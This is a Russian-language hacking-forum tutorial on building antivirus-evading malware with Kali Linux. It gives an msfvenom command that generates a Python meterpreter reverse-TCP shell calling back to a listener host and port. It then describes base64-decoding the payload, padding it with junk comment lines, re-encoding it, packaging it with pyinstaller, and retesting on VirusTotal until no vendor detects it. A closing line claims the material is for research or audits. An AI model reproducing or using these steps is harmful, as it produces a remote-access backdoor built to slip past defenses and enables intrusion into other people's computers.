Создайте незаметное вредоносное ПО за 10 минут с помощью Kali Linux | Форум хакерской тематики - Программы, исходники программ.

Создайте незаметное вредоносное ПО за 10 минут с помощью Kali Linux

Hidden bot

ГЕНЕРАЛ
Сообщения
1,107
Реакции
95,130
Баллы
874,666
Создайте незаметное вредоносное ПО за 10 минут с помощью Kali Linux


Создайте незаметное вредоносное ПО за 10 минут с помощью Kali Linux

Компании AV ежедневно участвуют в битве с киберпреступниками и хакерами, эти участники угроз будут пытаться использовать каждый возможный метод для достижения своей цели.
В этом уроке я расскажу вам, как можно создать оболочку VNC-счетчика, которая будет обходить все антивирусные компании, перечисленные на VirusTotal.com.
  • Вам необходимо установить: Kali linux

Начало

Запустите свою операционную систему Kali Linux и обновите ее до последней версии, используя команды «sudo apt-get update и sudo apt-get upgrade».

Теперь, когда вы обновили среду Kali Linux, мы создадим папку на рабочем столе под названием malware_cwz.

Вы можете сделать это, выполнив следующую команду на рабочем столе терминала:

Код:
mkdir malware_cwz
После того как каталог создан, перейдите в него:

Код:
cd malware_cwz
Теперь начинается забава, мы собираемся создавать вредоносное ПО с помощью meterpreter:

Код:
msfvenom -p python / meterpreter / reverse_tcp LHOST = 192.168.1.100 LPORT = 1337 R> encoded.py

Затем мы декодируем закодированную оболочку:

Откройте ‘encoded.py’ и скопируйте значение, которое вы можете найти в первом («till the nex»).

Значения должны быть похожи на случайные символы.

Код:
echo RANDOMVALUE | base64 --decode >> decoded.py

Теперь, когда значения были декодированы, мы собираемся отредактировать файл decoded.py.



Введите в терминале следующее:

введите в терминале следующее:

Код:
nano decoded.py

Теперь мы добавим случайный текст в каждую строку в файле, убедитесь, что текст содержит значение # в начале.


1604906397659.png


Теперь нам нужно снова закодировать его, сделать это с помощью одного и того же инструмента «base64» и скопировать закодированную строку в одно и то же место с именем «encoded.py».

Теперь, когда encoded.py полностью вооружен, мы можем создать из него исполняемый файл:

Код:
pyinstaller encoded.py

Затем файл сохраняется в каталоге /root/dist/nameofyourfile/

Загрузите файл на virustotal.com и повторите этот процесс, пока он не будет найден ни одной компанией AV.

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
 

Вложения

Сверху